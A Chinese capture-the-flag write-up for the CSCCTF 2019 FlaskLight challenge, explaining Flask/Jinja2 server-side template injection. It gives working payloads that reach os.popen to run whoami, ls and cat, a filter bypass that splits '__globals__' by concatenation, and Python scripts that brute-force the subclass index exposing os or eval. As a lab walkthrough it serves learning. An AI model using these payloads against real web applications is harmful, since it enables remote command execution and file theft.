[CSCCTF 2019 Qual]FlaskLight 1

目录

题目分析

看题目名称,可能是flask模板注入

查看页面源码,提示get方式传入search

text 复制代码
payload:?search={{7*7}}

返回49,确定是模板注入

模板注入相关知识

判断模板类型

继承关系


魔术方法

python 复制代码
__class__    # 查找当前类型的所属对象
__base__     # 沿着父子类的关系往上走一个
__mro__      # 查找当前对象继承的所有继承类
__subclasses__()    # 查找父类下所有的子类
__init__        # 查看类是否重载,重载指的是程序在运行时就加载好了这个模块到内存中,如果出现wrapper字眼,说明没有重载
__globals__        # 函数会以字典的形式返回当前对象的全部全局变量

常用注入模块

解法一:使用config

text 复制代码
payload:?search={{config}}

没ban环境变量,那么直接开始做题

text 复制代码
payload:?search={{config.__class__.__init__.__.globals__['os'].popen('whoami').read()}}

报错,应该是设置了过滤,经过逐个输入,确定过滤了global

过滤绕过

有许多绕过方法:

+拼接

~拼接

过滤器


寻找falg

我们使用+拼接即可绕过

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls').read()}}

看看flasklight

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls /flasklight').read()}}

查看flag

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen(''cat /flasklight/coomme_geeeett_youur_flek'').read()}}

解法二:在已加载os模块的子类中直接调用os模块

python脚本查找加载os模块的子类

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'os.py' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

寻找flag的过程省略

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}

解法三:内建函数eval执行命令

python脚本寻找命令位置

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'eval' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}
相关推荐
apocelipes11 小时前
常用编程语言和库的正则表达式性能对比
c语言·c++·python·性能优化·golang·开发工具和环境
用户83562907805112 小时前
使用 Python 在 PDF 中创建与管理书签
后端·python
MeixianAgent17 小时前
Python 回测数据入口怎么验?历史 K 线入库前先做 5 个检查
后端·python
咕白m62520 小时前
用 Python 实现一键批量查找与替换 Excel 数据
后端·python
SelectDB2 天前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
荣码2 天前
GraphRAG:普通RAG只能回答"点"的问题,我踩了4个坑才搞懂
java·python
金銀銅鐵2 天前
[Python] 基于欧几里得算法,实现分数约分计算器
python·数学
Lyn_Li2 天前
Kaggle Top 5 | 198只股票、200条数据的金融预测——BattleFin高分方案从零复现
python·kaggle·比赛复盘·金融预测
小九九的爸爸3 天前
前端想要入门Agent开发,要具备哪些Python基础?
python·agent·ai编程
阿耶同学3 天前
手把手教你用 LangGraph 搭建三层嵌套 Agent 架构
python·程序员